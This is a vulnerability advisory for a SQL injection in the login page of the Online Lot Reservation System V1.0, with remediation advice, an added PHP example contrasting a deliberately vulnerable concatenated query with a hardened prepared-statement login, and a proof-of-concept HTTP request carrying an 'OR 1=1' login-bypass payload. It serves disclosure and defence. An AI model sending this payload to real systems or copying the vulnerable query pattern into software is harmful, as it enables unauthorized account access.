# Vulnerability Summary: SQL Injection in Online Lot Reservation System V1.0

## Vulnerability Overview

* **Project Name**: Online Lot Reservation System V1.0
* **Vulnerable File**: `loginuser.php`
* **Vulnerability Type**: SQL Injection
* **Root Cause**: The system directly concatenates user input into SQL query statements without using prepared statements or input filtering. Attackers can inject malicious SQL code via the `email` and `password` parameters.

## Impact Scope

* **Impact**: Attackers can bypass login authentication and log into the system as an administrator or any other user.
* **Exploitation Conditions**: No prior login or authorization is required to exploit this vulnerability.

## Remediation

1. **Use Prepared Statements**:

   ```php
   $stmt = $mysqli->prepare("SELECT * FROM user WHERE email = ? AND password = ?");
   $stmt->bind_param("ss", $email, $password);
   ```

2. **Input Validation and Filtering**: Strictly validate user input formats and reject inputs containing special SQL characters.
3. **Error Handling**: Disable the output of database error messages to prevent leakage of database schema information.
4. **Principle of Least Privilege**: Database connections should use accounts with the minimum necessary permissions, avoiding granting excessive privileges to the application.
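The following is an added example, not code from the Online Lot Reservation System project, showing the concatenation pattern the advisory describes next to a hardened login that applies remediation items 1 to 3 together. Only the `user` table and its `email`/`password` columns come from the advisory's snippet; the function names, the `id` column, the connection details and the use of `password_hash()` digests (which goes one step beyond the advisory's bound plaintext password) are assumptions for illustration.

```php
<?php
// Added example (not code from the Online Lot Reservation System project).
// Table and column names (user, email, password) are from the advisory's
// remediation snippet; everything else is assumed for illustration.

// VULNERABLE pattern described by the advisory: raw POST values are concatenated
// into the query, so a quote in the email field changes the WHERE clause.
function login_vulnerable(mysqli $db, string $email, string $password): ?array {
    $sql = "SELECT * FROM user WHERE email = '$email' AND password = '$password'";
    $res = $db->query($sql);                 // attacker-controlled SQL runs here
    return $res ? $res->fetch_assoc() : null;
}

// HARDENED version: prepared statement with a bound parameter. The input reaches
// MySQL as data, never as SQL text, so quotes and comment sequences are inert.
function login_safe(mysqli $db, string $email, string $password): ?array {
    // Remediation 2: reject anything that is not a syntactically valid email first.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $stmt = $db->prepare("SELECT id, email, password FROM user WHERE email = ?");
    if ($stmt === false) {
        error_log('prepare failed: ' . $db->error);   // Remediation 3: log, never echo
        return null;
    }
    $stmt->bind_param("s", $email);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    // Assumed: passwords stored as password_hash() digests. password_verify()
    // does a constant-time comparison and keeps the password out of the SQL entirely.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Usage (assumed connection details; the account name reflects remediation 4):
// mysqli_report(MYSQLI_REPORT_OFF);   // driver errors are not surfaced to the client
// $db = new mysqli('localhost', 'onlinelot_app', 'secret', 'onlinelot');
// $user = login_safe($db, $_POST['email'] ?? '', $_POST['password'] ?? '');
```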
## POC Code (Successful Exploitation Packet)

```http
POST /onlinelot/loginuser.php HTTP/1.1
Host: 192.168.171.1:7777
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.171.1:7777/onlinelot/loginfailed.php
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Origin: http://192.168.171.1:7777
Cache-Control: max-age=0
Cookie: PHPSESSID=0h1lq9m6w4whrshdbmsoh11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 69

email=1vadsn27+OR%271%27%3D%271%27--+-&password=111&register=Log-In
```